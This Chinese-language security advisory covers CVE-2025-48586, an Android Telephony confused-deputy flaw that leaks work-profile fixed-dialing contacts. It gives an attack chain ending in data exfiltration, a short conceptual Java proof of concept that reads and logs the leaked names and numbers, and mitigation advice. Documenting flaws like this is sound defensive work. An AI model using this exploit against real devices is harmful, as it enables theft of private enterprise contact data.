CVE-2025-48586 Android EditFdnContactScreen联系人数据泄露漏洞

漏洞信息

漏洞编号

CVE-2025-48586

漏洞类型

权限提升/Confused Deputy攻击

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Android Telephony Service

漏洞概述

CVE-2025-48586是Android系统中存在的一个高危本地权限提升漏洞，位于Telephony服务的EditFdnContactScreen组件中。该漏洞源于onActivityResult回调处理机制中的权限验证缺陷，允许低权限应用通过混淆代理（Confused Deputy）攻击从工作配置文件（Work Profile）中窃取联系人信息。攻击者无需获取任何特殊权限即可利用此漏洞，且无需用户交互即可完成攻击。此漏洞的CVSS评分为7.8，属于高危级别，对Android设备的企业安全性构成严重威胁，特别是使用工作配置文件功能的企业移动设备管理（EMM）场景。

技术细节

该漏洞存在于Android系统的packages/services/Telephony组件中的EditFdnContactScreen.java文件。具体问题出在onActivityResult方法的实现上，当处理Activity返回结果时，系统未能正确验证调用者的身份和权限。攻击者可以利用Android的Intent机制，通过构造特定的返回数据，诱使EditFdnContactScreen组件将工作配置文件中的Fdn（固定拨号）联系人列表返回给恶意应用。由于Android的工作配置文件机制允许在同一设备上隔离个人数据和企业数据，攻击者本应无法访问工作配置文件中的联系人，但由于权限验证缺陷，可以绕过这一安全边界。这种Confused Deputy攻击的核心在于利用系统组件的信任关系，让高权限组件代替攻击者执行敏感操作，从而获取本无权访问的数据。

攻击链分析

STEP 1

步骤1：环境准备

攻击者首先确保目标Android设备已配置工作配置文件（Work Profile），并在工作配置文件中添加了Fdn固定拨号联系人。这是漏洞利用的前提条件。

STEP 2

步骤2：构造恶意Intent

攻击者构造一个特制的Intent，指定启动com.android.phone包中的EditFdnContactScreen组件。该Intent包含特定的action和extra参数，用于触发联系人编辑流程。

STEP 3

步骤3：注册结果回调

攻击应用通过ActivityResult API注册一个自定义的回调处理器，用于接收EditFdnContactScreen返回的结果数据。这个回调将成为Confused Deputy攻击的关键环节。

STEP 4

步骤4：触发漏洞代码路径

当EditFdnContactScreen的onActivityResult被调用时，由于缺少正确的调用者验证，系统会将工作配置文件中的联系人数据返回给攻击者注册的回调，而不是返回给原始的调用组件。

STEP 5

步骤5：数据提取与外传

攻击者从接收到的Intent数据中提取联系人信息（包括姓名和电话号码），然后将这些敏感数据记录日志或通过网络发送给远程服务器，完成数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-48586 PoC - Confused Deputy Attack on Android EditFdnContactScreen
// This PoC demonstrates the concept of exploiting the confused deputy vulnerability

// Step 1: Launch the EditFdnContactScreen activity with a malicious callback
Intent intent = new Intent();
intent.setComponent(new ComponentName(
    "com.android.phone", 
    "com.android.phone.EditFdnContactScreen"
));
intent.setAction(Intent.ACTION_INSERT_OR_EDIT);
intent.putExtra("insert_edit_mode", "insert");

// Step 2: Register a custom ActivityResultCallback to intercept results
registerForActivityResult(new ActivityResultContracts.StartActivityForResult(), result -> {
    if (result.getResultCode() == Activity.RESULT_OK) {
        Intent data = result.getData();
        if (data != null) {
            // Step 3: Extract contact data from the returned intent
            // Due to the confused deputy issue, work profile contacts may be exposed
            Bundle extras = data.getExtras();
            if (extras != null) {
                String contactName = extras.getString("name");
                String contactPhone = extras.getString("number");
                // Log or exfiltrate the contact data
                Log.d("CVE-2025-48586", "Leaked Contact: " + contactName + ", " + contactPhone);
            }
        }
    }
}).launch(intent);

// Note: This is a conceptual PoC. Actual exploitation requires:
// 1. Device with work profile configured
// 2. FDN contacts enabled in work profile
// 3. Specific timing and intent manipulation
// Reference: https://android.googlesource.com/platform/packages/services/Telephony/+/851fc787e96189a37f88cb9eaa688087883357c3

影响范围

Android Telephony Service (具体版本需查看2025-12-01安全公告)

受影响的Android版本范围需参考source.android.com/security/bulletin/2025-12-01

防御指南

临时缓解措施

由于该漏洞需要系统级修复，用户层面难以完全缓解。建议采取以下临时措施：1) 避免在企业设备上使用不受信任的第三方电话应用；2) 限制工作配置文件中的Fdn联系人数量，减少潜在泄露风险；3) 监控设备异常网络流量，及时发现数据外传行为；4) 企业用户应联系IT部门确认设备是否已接收安全更新。最根本的解决方案是等待并应用Google发布的安全补丁。